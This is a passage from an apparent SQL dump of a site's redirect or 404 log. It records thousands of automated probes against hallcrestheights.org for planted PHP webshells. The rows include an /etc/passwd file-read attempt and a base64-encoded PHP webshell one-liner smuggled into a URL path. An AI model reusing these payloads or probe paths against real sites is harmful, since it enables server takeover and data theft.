00:00:00'),(13488,'http://www.hallcrestheights.org/typo3/index.php',NULL,'http://www.hallcrestheights.org/','',1,0,'2018-01-10 11:54:35','0000-00-00 00:00:00'),(13489,'http://hallcrestheights.org/images/librareis.php',NULL,'http://site.ru','',1,0,'2018-01-10 12:20:56','0000-00-00 00:00:00'),(13490,'http://hallcrestheights.org/index.php',NULL,'hallcrestheights.org','',123,0,'2018-01-10 18:46:24','0000-00-00 00:00:00'),(13491,'http://www.hallcrestheights.org//components/com_foxcontact/',NULL,'','',1,0,'2018-01-10 23:56:19','0000-00-00 00:00:00'),(13492,'http://hallcrestheights.org//hallcrestheights.org/create-an-account.html',NULL,'http://hallcrestheights.org//hallcrestheights.org/create-an-account.html','',2,0,'2018-01-11 10:43:43','0000-00-00 00:00:00'),(13493,'http://hallcrestheights.org/components/com_contact/views/category/com_contact_info.php?c=phpinfo',NULL,'hallcrestheights.org','',1,0,'2018-01-15 13:01:56','0000-00-00 00:00:00'),(13494,'http://hallcrestheights.org/images/side.php',NULL,'hallcrestheights.org','',1,0,'2018-01-16 08:24:58','0000-00-00 00:00:00'),(13495,'http://hallcrestheights.org/side.php',NULL,'hallcrestheights.org','',1,0,'2018-01-16 08:26:56','0000-00-00 00:00:00'),(13496,'http://hallcrestheights.org/plugins/user/pre.php',NULL,'hallcrestheights.org','',1,0,'2018-01-16 08:41:17','0000-00-00 00:00:00'),(13497,'http://hallcrestheights.org/images/1ndex.php?z3=QkUzZXVLLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2018-01-16 15:35:11','0000-00-00 00:00:00'),(13498,'http://hallcrestheights.org/cache/cachee.php?z3=QkUzZXVLLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2018-01-16 15:36:10','0000-00-00 00:00:00'),(13499,'http://hallcrestheights.org/maill.php?z3=QkUzZXVLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-01-16 15:36:54','0000-00-00 00:00:00'),(13500,'http://hallcrestheights.org/wp-cache.php?z3=QkUzZXVLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-01-16 15:36:57','0000-00-00 00:00:00'),(13501,'http://hallcrestheights.org/wp-content/plugins/Fbrrchive.php?z3=QkUzZXVLLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2018-01-16 15:38:14','0000-00-00 00:00:00'),(13502,'http://hallcrestheights.org/SessionController.php?z3=QkUzZXVLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-01-16 15:38:17','0000-00-00 00:00:00'),(13503,'http://hallcrestheights.org/webconfig.txt.php?z3=QkUzZXVLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-01-16 15:36:59','0000-00-00 00:00:00'),(13504,'http://hallcrestheights.org/robots.txt.php?z3=QkUzZXVLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-01-16 15:38:45','0000-00-00 00:00:00'),(13505,'http://hallcrestheights.org/sql_dump.php?z3=QkUzZXVLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-01-16 15:38:49','0000-00-00 00:00:00'),(13506,'http://hallcrestheights.org/jconfig.php?z3=QkUzZXVLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-01-16 15:37:29','0000-00-00 00:00:00'),(13507,'http://hallcrestheights.org/thumb.php?z3=QkUzZXVLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-01-16 15:38:52','0000-00-00 00:00:00'),(13508,'http://hallcrestheights.org/al277.php?z3=QkUzZXVLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-01-16 15:39:35','0000-00-00 00:00:00'),(13509,'http://hallcrestheights.org/images/al277.php?z3=QkUzZXVLLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2018-01-16 15:39:36','0000-00-00 00:00:00'),(13510,'http://hallcrestheights.org/wsdl.php?z3=QkUzZXVLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-01-16 15:39:38','0000-00-00 00:00:00'),(13511,'http://hallcrestheights.org/wp-data.php?z3=QkUzZXVLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-01-16 15:39:40','0000-00-00 00:00:00'),(13512,'http://hallcrestheights.org/media/1ndex.php?z3=QkUzZXVLLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2018-01-16 15:39:01','0000-00-00 00:00:00'),(13513,'http://hallcrestheights.org/media/tmp.php?z3=QkUzZXVLLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2018-01-16 15:40:24','0000-00-00 00:00:00'),(13514,'http://hallcrestheights.org/google-assist.php?z3=QkUzZXVLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-01-16 15:40:31','0000-00-00 00:00:00'),(13515,'http://hallcrestheights.org/elements.php?z3=QkUzZXVLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-01-16 15:41:12','0000-00-00 00:00:00'),(13516,'http://hallcrestheights.org/cache/defau1t.php?z3=QkUzZXVLLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2018-01-16 15:41:13','0000-00-00 00:00:00'),(13517,'http://hallcrestheights.org/roubt.php?z3=QkUzZXVLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-01-16 15:41:47','0000-00-00 00:00:00'),(13518,'http://hallcrestheights.org/bookmark.php?z3=QkUzZXVLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-01-16 15:40:32','0000-00-00 00:00:00'),(13519,'http://hallcrestheights.org/wp-content/plugins/sql_dump.php?z3=QkUzZXVLLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2018-01-16 15:43:16','0000-00-00 00:00:00'),(13520,'http://hallcrestheights.org/wp-content/uploads/Fbrrchive.php?z3=QkUzZXVLLnBocA==&z4=L3dwLWNvbnRlbnQvdXBsb2Fkcy8=',NULL,'hallcrestheights.org','',2,0,'2018-01-16 15:44:40','0000-00-00 00:00:00'),(13521,'http://hallcrestheights.org/wp-content/plugins/wpfootes.php?z3=QkUzZXVLLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2018-01-16 15:45:16','0000-00-00 00:00:00'),(13522,'http://hallcrestheights.org/modules/modules/modules.php?z3=QkUzZXVLLnBocA==&z4=L21vZHVsZXMvbW9kdWxlcy8=',NULL,'hallcrestheights.org','',2,0,'2018-01-16 15:46:02','0000-00-00 00:00:00'),(13523,'http://hallcrestheights.org/wp-content/themes/fossy-speurhondenworst/divi-children-engine/divi_children_engine.php?z3=QkUzZXVLLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL2Zvc3N5LXNwZXVyaG9uZGVud29yc3QvZGl2aS1jaGlsZHJlbi1lbmdpbmUv',NULL,'hallcrestheights.org','',2,0,'2018-01-16 15:46:03','0000-00-00 00:00:00'),(13524,'http://hallcrestheights.org/wp-content/themes/margreetalgra/404.php?z3=QkUzZXVLLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL21hcmdyZWV0YWxncmEv',NULL,'hallcrestheights.org','',2,0,'2018-01-16 15:46:05','0000-00-00 00:00:00'),(13525,'http://hallcrestheights.org/wp-content/themes/twentyeleven-child/footer.php?z3=QkUzZXVLLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL3R3ZW50eWVsZXZlbi1jaGlsZC8=',NULL,'hallcrestheights.org','',2,0,'2018-01-16 15:46:07','0000-00-00 00:00:00'),(13526,'http://hallcrestheights.org/email.php?z3=QkUzZXVLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2018-01-16 15:47:09','0000-00-00 00:00:00'),(13527,'http://hallcrestheights.org/images/stories/0day.php?z3=QkUzZXVLLnBocA==&z4=L2ltYWdlcy9zdG9yaWVzLw==',NULL,'hallcrestheights.org','',2,0,'2018-01-16 15:47:10','0000-00-00 00:00:00'),(13528,'http://hallcrestheights.org/install.php?z3=QkUzZXVLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-01-16 15:47:11','0000-00-00 00:00:00'),(13529,'http://hallcrestheights.org/xmlsrpc.php?z3=QkUzZXVLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-01-16 15:48:36','0000-00-00 00:00:00'),(13530,'http://hallcrestheights.org/wp-content/plugins/Analyser.php?z3=QkUzZXVLLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2018-01-16 15:48:38','0000-00-00 00:00:00'),(13531,'http://hallcrestheights.org/shootmei.php?z3=QkUzZXVLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-01-16 15:48:39','0000-00-00 00:00:00'),(13532,'http://hallcrestheights.org/Abbrevsprl.php?z3=QkUzZXVLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-01-16 15:49:26','0000-00-00 00:00:00'),(13533,'http://hallcrestheights.org/wp-content/1ndex.php?z3=QkUzZXVLLnBocA==&z4=L3dwLWNvbnRlbnQv',NULL,'hallcrestheights.org','',1,0,'2018-01-16 15:54:29','0000-00-00 00:00:00'),(13534,'http://hallcrestheights.org/media/404.php?z3=QkUzZXVLLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',1,0,'2018-01-16 15:55:34','0000-00-00 00:00:00'),(13535,'http://hallcrestheights.org/authenticating.php?z3=QkUzZXVLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-01-16 15:55:37','0000-00-00 00:00:00'),(13536,'http://hallcrestheights.org/show.php?z3=QkUzZXVLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-01-16 15:55:39','0000-00-00 00:00:00'),(13537,'http://hallcrestheights.org/cache/news.php?z3=QkUzZXVLLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2018-01-16 15:54:52','0000-00-00 00:00:00'),(13538,'http://hallcrestheights.org/images/head.php?z3=QkUzZXVLLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2018-01-16 15:56:16','0000-00-00 00:00:00'),(13539,'http://hallcrestheights.org/wp-content/plugins/wp-lg3.php?z3=QkUzZXVLLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2018-01-16 15:56:20','0000-00-00 00:00:00'),(13540,'http://hallcrestheights.org/wp-content/plugins/wp-lg2.php?z3=QkUzZXVLLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2018-01-16 15:55:01','0000-00-00 00:00:00'),(13541,'http://hallcrestheights.org/files/files.php?z3=QkUzZXVLLnBocA==&z4=L2ZpbGVzLw==',NULL,'hallcrestheights.org','',2,0,'2018-01-16 15:57:08','0000-00-00 00:00:00'),(13542,'http://hallcrestheights.org/wp-content/plugins/caches.php?z3=QkUzZXVLLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2018-01-16 15:57:12','0000-00-00 00:00:00'),(13543,'http://hallcrestheights.org/libraries/phputf8/phputf8.php',NULL,'hallcrestheights.org','',1,0,'2018-01-16 15:57:20','0000-00-00 00:00:00'),(13544,'http://hallcrestheights.org/cache/list.php?z3=QkUzZXVLLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2018-01-16 15:58:03','0000-00-00 00:00:00'),(13545,'http://hallcrestheights.org/libraries/joomla/1ndex.php?z3=QkUzZXVLLnBocA==&z4=L2xpYnJhcmllcy9qb29tbGEv',NULL,'hallcrestheights.org','',1,0,'2018-01-16 15:58:29','0000-00-00 00:00:00'),(13546,'http://hallcrestheights.org/components/com_banners/setting.php',NULL,'hallcrestheights.org','',1,0,'2018-01-16 15:57:12','0000-00-00 00:00:00'),(13547,'http://hallcrestheights.org/components/com_wrapper/wraper.php',NULL,'hallcrestheights.org','',1,0,'2018-01-16 15:57:54','0000-00-00 00:00:00'),(13548,'http://hallcrestheights.org/modules/mod_archive/tmpl/index.php',NULL,'hallcrestheights.org','',1,0,'2018-01-16 15:59:20','0000-00-00 00:00:00'),(13549,'http://hallcrestheights.org/images/laj.php?z3=QkUzZXVLLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',1,0,'2018-01-16 15:58:32','0000-00-00 00:00:00'),(13550,'http://hallcrestheights.org/log.php?z3=QkUzZXVLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-01-16 15:59:56','0000-00-00 00:00:00'),(13551,'http://hallcrestheights.org/includes/u2p.php?z3=QkUzZXVLLnBocA==&z4=L2luY2x1ZGVzLw==',NULL,'hallcrestheights.org','',2,0,'2018-01-16 16:00:29','0000-00-00 00:00:00'),(13552,'http://hallcrestheights.org/cache/cache_aqbmkwwx.php?z3=QkUzZXVLLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2018-01-16 16:01:03','0000-00-00 00:00:00'),(13553,'http://hallcrestheights.org/dswat.org/wsdl.php?z3=QkUzZXVLLnBocA==&z4=L2Rzd2F0Lm9yZy8=',NULL,'hallcrestheights.org','',2,0,'2018-01-16 16:01:06','0000-00-00 00:00:00'),(13554,'http://hallcrestheights.org/site/tmp/cTivrC.php?z3=QkUzZXVLLnBocA==&z4=L3NpdGUvdG1wLw==',NULL,'hallcrestheights.org','',2,0,'2018-01-16 16:01:09','0000-00-00 00:00:00'),(13555,'http://hallcrestheights.org/wp-main.php?z3=QkUzZXVLLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-01-16 15:59:55','0000-00-00 00:00:00'),(13556,'http://hallcrestheights.org/images/robots.txt.php?z3=QkUzZXVLLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2018-01-16 16:01:17','0000-00-00 00:00:00'),(13557,'http://hallcrestheights.org/cli/40dd1d.php?z3=QkUzZXVLLnBocA==&z4=L2NsaS8=',NULL,'hallcrestheights.org','',2,0,'2018-01-16 16:01:20','0000-00-00 00:00:00'),(13558,'http://www.hallcrestheights.org/components/com_b2jcontact/',NULL,'','',1,0,'2018-01-18 09:01:25','0000-00-00 00:00:00'),(13559,'http://hallcrestheights.org/wp-content/plugins/justified-image-grid/download.php?file=file:///etc/passwd',NULL,'','',1,0,'2018-01-18 10:36:38','0000-00-00 00:00:00'),(13560,'https://hallcrestheights.org/templates/jtemplates/jtemplates.php',NULL,'hallcrestheights.org','',1,0,'2018-01-18 18:38:25','0000-00-00 00:00:00'),(13561,'https://hallcrestheights.org/modules/mod_jmodule/mod_jmodule.php',NULL,'hallcrestheights.org','',1,0,'2018-01-18 18:51:43','0000-00-00 00:00:00'),(13562,'https://hallcrestheights.org/templates/j7templates/j7templates.php',NULL,'hallcrestheights.org','',1,0,'2018-01-18 19:04:45','0000-00-00 00:00:00'),(13563,'https://hallcrestheights.org/plugins/jplugin/jplugin/j2plugin.php',NULL,'hallcrestheights.org','',1,0,'2018-01-18 19:08:57','0000-00-00 00:00:00'),(13564,'https://hallcrestheights.org/templates/beez/index.php',NULL,'hallcrestheights.org','',1,0,'2018-01-18 19:15:12','0000-00-00 00:00:00'),(13565,'https://hallcrestheights.org/cache/thumbsj3tmp/img.resize.php',NULL,'hallcrestheights.org','',1,0,'2018-01-18 19:15:31','0000-00-00 00:00:00'),(13566,'https://hallcrestheights.org/templates/j9templates/j9templates.php',NULL,'hallcrestheights.org','',1,0,'2018-01-18 19:38:28','0000-00-00 00:00:00'),(13567,'https://hallcrestheights.org/templates/j11templates/j11templates.php',NULL,'hallcrestheights.org','',1,0,'2018-01-18 19:39:36','0000-00-00 00:00:00'),(13568,'http://hallcrestheights.org/components/com_foxcontact/sef_ext/com_foxcontact.php',NULL,'','',1,0,'2018-01-20 12:57:31','0000-00-00 00:00:00'),(13569,'https://hallcrestheights.org/index.php',NULL,'hallcrestheights.org','',1,0,'2018-01-22 12:38:25','0000-00-00 00:00:00'),(13570,'https://hallcrestheights.org/tmp/plain;base64,PD9waHAgQGFzc2VydChAYmFzZTY0X2RlY29kZShAc3RyX3JvdDEzKCRfUE9TVFsiZGF0YSJdKSkpO2RpZTs7Pz4=;.php',NULL,'hallcrestheights.org','',1,0,'2018-01-23 10:41:38','0000-00-00 00:00:00'),(13571,'http://hallcrestheights.org/tmp/plain;base64,PD9waHAgQGFzc2VydChAYmFzZTY0X2RlY29kZShAc3RyX3JvdDEzKCRfUE9TVFsiZGF0YSJdKSkpO2RpZTs7Pz4=;.php',NULL,'hallcrestheights.org','',1,0,'2018-01-23 14:24:41','0000-00-00 00:00:00'),(13572,'http://hallcrestheights.org/components/com_foxcontact/1.php',NULL,'http://site.ru','',2,0,'2018-01-29 10:10:17','0000-00-00 00:00:00'),(13573,'http://hallcrestheights.org/components/com_b2jcontact/x0x04.php',NULL,'http://site.ru','',1,0,'2018-01-29 12:00:09','0000-00-00 00:00:00'),(13574,'http://hallcrestheights.org/bacot.php',NULL,'http://site.ru','',2,0,'2018-01-29 12:46:17','0000-00-00 00:00:00'),(13575,'http://hallcrestheights.org/templates/0.php',NULL,'http://site.ru','',2,0,'2018-01-29 12:47:21','0000-00-00 00:00:00'),(13576,'http://hallcrestheights.org/modules/mod_simplefileuploadv1.4/Marvins.php',NULL,'http://site.ru','',2,0,'2018-01-29 14:12:32','0000-00-00 00:00:00'),(13577,'http://hallcrestheights.org/media/system/css/shewil!.php',NULL,'http://site.ru','',2,0,'2018-01-29 14:34:47','0000-00-00 00:00:00'),(13578,'http://hallcrestheights.org/images/stories/me.php',NULL,'http://site.ru','',1,0,'2018-01-29 15:51:46','0000-00-00 00:00:00'),(13579,'http://hallcrestheights.org/libraries/pGSQ.php',NULL,'http://site.ru','',1,0,'2018-01-29 18:40:54','0000-00-00 00:00:00'),(13580,'http://hallcrestheights.org/xGASUPx.php',NULL,'http://site.ru','',2,0,'2018-01-29 21:43:23','0000-00-00 00:00:00'),(13581,'http://hallcrestheights.org/customer/account/create/',NULL,'','',1,0,'2018-01-30 12:27:32','0000-00-00 00:00:00'),(13582,'http://hallcrestheights.org/wp-caches.php',NULL,'http://site.ru','',1,0,'2018-01-30 17:23:24','0000-00-00 00:00:00'),(13583,'http://hallcrestheights.org/language/en-GB/error.php',NULL,'http://site.ru','',1,0,'2018-01-31 00:46:49','0000-00-00 00:00:00'),(13584,'http://hallcrestheights.org/tags.php',NULL,'http://site.ru','',1,0,'2018-01-31 01:58:50','0000-00-00 00:00:00'),(13585,'http://hallcrestheights.org/images/stories/ok.php',NULL,'http://site.ru','',6,0,'2018-01-31 06:01:17','0000-00-00 00:00:00'),(13586,'http://hallcrestheights.org/components/com_foxcontact/b0x.php',NULL,'http://site.ru','',2,0,'2018-01-31 13:32:52','0000-00-00 00:00:00'),(13587,'http://hallcrestheights.org/components/Marvins.php',NULL,'http://site.ru','',1,0,'2018-01-31 19:31:08','0000-00-00 00:00:00'),(13588,'http://hallcrestheights.org/libraries/phputf8/utils/test.php',NULL,'http://site.ru','',1,0,'2018-01-31 20:34:26','0000-00-00 00:00:00'),(13589,'http://www.hallcrestheights.org/components/com_jce/index.html',NULL,'','',1,0,'2018-01-31 21:22:40','0000-00-00 00:00:00'),(13590,'http://hallcrestheights.org/includes/domit/xmlrpz.php',NULL,'http://site.ru','',1,0,'2018-02-01 09:40:04','0000-00-00 00:00:00'),(13591,'http://hallcrestheights.org/q3okr9.php',NULL,'http://site.ru','',2,0,'2018-02-01 09:48:25','0000-00-00 00:00:00'),(13592,'http://hallcrestheights.org/language/shell.php',NULL,'http://site.ru','',2,0,'2018-02-01 09:53:55','0000-00-00 00:00:00'),(13593,'http://hallcrestheights.org/plugins/editors/jckeditor/jckeditor/plugins/jfilebrowser/images/icons/desua.php',NULL,'http://site.ru','',2,0,'2018-02-01 09:56:46','0000-00-00 00:00:00'),(13594,'http://hallcrestheights.org/components/com_tags/sijmuqi.php',NULL,'http://site.ru','',1,0,'2018-02-01 09:59:31','0000-00-00 00:00:00'),(13595,'http://hallcrestheights.org/tmp/com_virtuemart_allinone_update/admin/plugins/vmpayment/heidelpay/Dwsonv.php',NULL,'http://site.ru','',1,0,'2018-02-01 10:02:59','0000-00-00 00:00:00'),(13596,'http://hallcrestheights.org/plugins/editors-xtd/ws_shortcodebutton/helper/images/plmrmb.php',NULL,'http://site.ru','',1,0,'2018-02-01 10:38:47','0000-00-00 00:00:00'),(13597,'http://hallcrestheights.org/log/logs/error.php',NULL,'http://site.ru','',1,0,'2018-02-01 10:48:21','0000-00-00 00:00:00'),(13598,'http://hallcrestheights.org/tmp/install_59c2b23c0a14e/packages/install_59c2b23ea3efc/administrator/dieace.php',NULL,'http://site.ru','',2,0,'2018-02-01 10:55:10','0000-00-00 00:00:00'),(13599,'http://hallcrestheights.org/language/overrides/wp-logins.php',NULL,'http://site.ru','',2,0,'2018-02-01 10:56:44','0000-00-00 00:00:00'),(13600,'http://hallcrestheights.org/cli/dawhk.php',NULL,'http://site.ru','',1,0,'2018-02-01 11:17:06','0000-00-00 00:00:00'),(13601,'http://hallcrestheights.org/seller82_5421508cdcc345075ecbf9bdd905afeb.php',NULL,'http://site.ru','',1,0,'2018-02-01 11:25:26','0000-00-00 00:00:00'),(13602,'http://hallcrestheights.org/libraries/cms/html/slbut.php',NULL,'http://site.ru','',2,0,'2018-02-01 11:40:20','0000-00-00 00:00:00'),(13603,'http://hallcrestheights.org/modules/mod_simplefileuploadv1.4/kv.php',NULL,'http://site.ru','',1,0,'2018-02-01 11:39:30','0000-00-00 00:00:00'),(13604,'http://hallcrestheights.org/components/fabwjf.php',NULL,'http://site.ru','',2,0,'2018-02-01 13:06:15','0000-00-00 00:00:00'),(13605,'http://hallcrestheights.org/components/com_content/ead2sz.php',NULL,'http://site.ru','',1,0,'2018-02-01 13:06:32','0000-00-00 00:00:00'),(13606,'http://hallcrestheights.org/star/plugins/vmpayment/standard/language/en-GB/kimwv.php',NULL,'http://site.ru','',1,0,'2018-02-01 13:08:39','0000-00-00 00:00:00'),(13607,'http://hallcrestheights.org/imag/rxosrl.php',NULL,'http://site.ru','',1,0,'2018-02-01 13:09:48','0000-00-00 00:00:00'),(13608,'http://hallcrestheights.org/components/com_content/views/categories/tmpl/ini.php',NULL,'http://site.ru','',1,0,'2018-02-01 13:15:10','0000-00-00 00:00:00'),(13609,'http://hallcrestheights.org/wp-content/plugins/nav-menus.php',NULL,'http://site.ru','',2,0,'2018-02-01 13:28:06','0000-00-00 00:00:00'),(13610,'http://hallcrestheights.org/components/com_virtuemart/themes/default/templates/browse/sql-ou.php',NULL,'http://site.ru','',1,0,'2018-02-01 14:02:59','0000-00-00 00:00:00'),(13611,'http://hallcrestheights.org/media/shell.php',NULL,'http://site.ru','',2,0,'2018-02-01 14:02:11','0000-00-00 00:00:00'),(13612,'http://hallcrestheights.org/components/com_phocagallery/views/info/tmpl/desua.php',NULL,'http://site.ru','',1,0,'2018-02-01 14:10:22','0000-00-00 00:00:00'),(13613,'http://hallcrestheights.org/plugins/editors/jce/tiny_mce/plugins/advcode/img/debug.php',NULL,'http://site.ru','',1,0,'2018-02-01 14:10:45','0000-00-00 00:00:00'),(13614,'http://hallcrestheights.org/tounsicoke.php',NULL,'http://site.ru','',2,0,'2018-02-01 15:01:12','0000-00-00 00:00:00'),(13615,'http://hallcrestheights.org/star/administrator/templates/hathor/html/com_messages/messages/pouimeq.php',NULL,'http://site.ru','',2,0,'2018-02-01 15:01:22','0000-00-00 00:00:00'),(13616,'http://hallcrestheights.org/templates/beez/wso.php',NULL,'http://site.ru','',1,0,'2018-02-01 15:02:04','0000-00-00 00:00:00'),(13617,'http://hallcrestheights.org/media/editors/tinymce/plugins/example_dependency/debug.php',NULL,'http://site.ru','',1,0,'2018-02-01 15:09:12','0000-00-00 00:00:00'),(13618,'http://hallcrestheights.org/templates/go_roundy/css/omquas.php',NULL,'http://site.ru','',2,0,'2018-02-01 15:27:45','0000-00-00 00:00:00'),(13619,'http://hallcrestheights.org/templates/default/img/carousel/lomnw.php',NULL,'http://site.ru','',1,0,'2018-02-01 16:02:55','0000-00-00 00:00:00'),(13620,'http://hallcrestheights.org/plugins/vmcalculation/avalara/classes/wsdl/bcdaz.php',NULL,'http://site.ru','',1,0,'2018-02-01 16:02:07','0000-00-00 00:00:00'),(13621,'http://hallcrestheights.org/plugins/editors-xtd/xhmskkz.php',NULL,'http://site.ru','',1,0,'2018-02-01 16:05:07','0000-00-00 00:00:00'),(13622,'http://hallcrestheights.org/1/administrator/components/com_newsfeeds/views/newsfeeds/sql-ou.php',NULL,'http://site.ru','',2,0,'2018-02-01 16:07:51','0000-00-00 00:00:00'),(13623,'http://hallcrestheights.org/media/com_finder/js/wrkim.php',NULL,'http://site.ru','',1,0,'2018-02-01 16:21:28','0000-00-00 00:00:00'),(13624,'http://hallcrestheights.org/templates/beez5/-.php',NULL,'http://site.ru','',3,0,'2018-02-01 16:23:23','0000-00-00 00:00:00'),(13625,'http://hallcrestheights.org/plugins/editors/jckeditor/jckeditor/plugins/templates/dialogs/pube.php',NULL,'http://site.ru','',3,0,'2018-02-01 16:27:40','0000-00-00 00:00:00'),(13626,'http://hallcrestheights.org/libraries/joomla/database/importer/1.php',NULL,'http://site.ru','',1,0,'2018-02-01 17:06:08','0000-00-00 00:00:00'),(13627,'http://hallcrestheights.org/components/com_media/string.php',NULL,'http://site.ru','',1,0,'2018-02-01 17:21:40','0000-00-00 00:00:00'),(13628,'http://hallcrestheights.org/libraries/legacy/finzbfb.php',NULL,'http://site.ru','',1,0,'2018-02-01 17:35:04','0000-00-00 00:00:00'),(13629,'http://hallcrestheights.org/layouts/joomla/links/jnxsn.php',NULL,'http://site.ru','',1,0,'2018-02-01 17:49:55','0000-00-00 00:00:00'),(13630,'http://hallcrestheights.org/components/com_users/helpers/html/mhhrx.php',NULL,'http://site.ru','',1,0,'2018-02-01 17:52:02','0000-00-00 00:00:00'),(13631,'http://hallcrestheights.org/images/stories/index_backup.php',NULL,'http://site.ru','',1,0,'2018-02-01 17:54:28','0000-00-00 00:00:00'),(13632,'http://hallcrestheights.org/includes/classp6.php',NULL,'http://site.ru','',1,0,'2018-02-01 17:55:35','0000-00-00 00:00:00'),(13633,'http://hallcrestheights.org/layouts/hdovr.php',NULL,'http://site.ru','',2,0,'2018-02-01 17:58:06','0000-00-00 00:00:00'),(13634,'http://hallcrestheights.org/templates/atomic/b0xed.php',NULL,'http://site.ru','',1,0,'2018-02-01 18:01:08','0000-00-00 00:00:00'),(13635,'http://hallcrestheights.org/plugins/xmlrpc/avvli.php',NULL,'http://site.ru','',1,0,'2018-02-01 18:46:52','0000-00-00 00:00:00'),(13636,'http://hallcrestheights.org/IQ4Age.php',NULL,'http://site.ru','',1,0,'2018-02-01 18:47:52','0000-00-00 00:00:00'),(13637,'http://hallcrestheights.org/images/stories/..wil!.php',NULL,'http://site.ru','',1,0,'2018-02-01 18:50:16','0000-00-00 00:00:00'),(13638,'http://hallcrestheights.org/plugins/editors/tinymce/jscripts/tiny_mce/plugins/fullscreen/langs/desua.php',NULL,'http://site.ru','',1,0,'2018-02-01 19:05:07','0000-00-00 00:00:00'),(13639,'http://hallcrestheights.org/joomla/administrator/templates/khepri/images/menu/sql-ou.php',NULL,'http://site.ru','',1,0,'2018-02-01 19:08:49','0000-00-00 00:00:00'),(13640,'http://hallcrestheights.org/kErwQh.php',NULL,'http://site.ru','',1,0,'2018-02-01 19:34:28','0000-00-00 00:00:00'),(13641,'http://hallcrestheights.org/Plss.php',NULL,'http://site.ru','',2,0,'2018-02-01 19:36:02','0000-00-00 00:00:00'),(13642,'http://hallcrestheights.org/modules/mod_tzk2_new/tmpl/BoxTwo/sky.php',NULL,'http://site.ru','',1,0,'2018-02-01 19:51:17','0000-00-00 00:00:00'),(13643,'http://hallcrestheights.org/templates/system/images/green.php',NULL,'http://site.ru','',1,0,'2018-02-01 20:38:34','0000-00-00 00:00:00'),(13644,'http://hallcrestheights.org/forum/logo_img.php',NULL,'http://site.ru','',1,0,'2018-02-01 20:40:40','0000-00-00 00:00:00'),(13645,'http://hallcrestheights.org/templates/plantillabaratey3/html/com_content/featured/connet.php',NULL,'http://site.ru','',2,0,'2018-02-01 20:42:04','0000-00-00 00:00:00'),(13646,'http://hallcrestheights.org/wp-includes/admin_login.php',NULL,'http://site.ru','',1,0,'2018-02-01 21:26:26','0000-00-00 00:00:00'),(13647,'http://hallcrestheights.org/media/editors/codemirror/mode/nsis/pouimeq.php',NULL,'http://site.ru','',2,0,'2018-02-01 21:30:40','0000-00-00 00:00:00'),(13648,'http://hallcrestheights.org/joomla/components/com_search/views/search/desua.php',NULL,'http://site.ru','',1,0,'2018-02-01 21:32:29','0000-00-00 00:00:00'),(13649,'http://hallcrestheights.org/prom.php',NULL,'http://site.ru','',2,0,'2018-02-01 21:47:03','0000-00-00 00:00:00'),(13650,'http://hallcrestheights.org/images/stories/img.png.php',NULL,'http://site.ru','',1,0,'2018-02-01 22:08:33','0000-00-00 00:00:00'),(13651,'http://hallcrestheights.org/layouts/dxhox.php',NULL,'http://site.ru','',3,0,'2018-02-01 22:07:17','0000-00-00 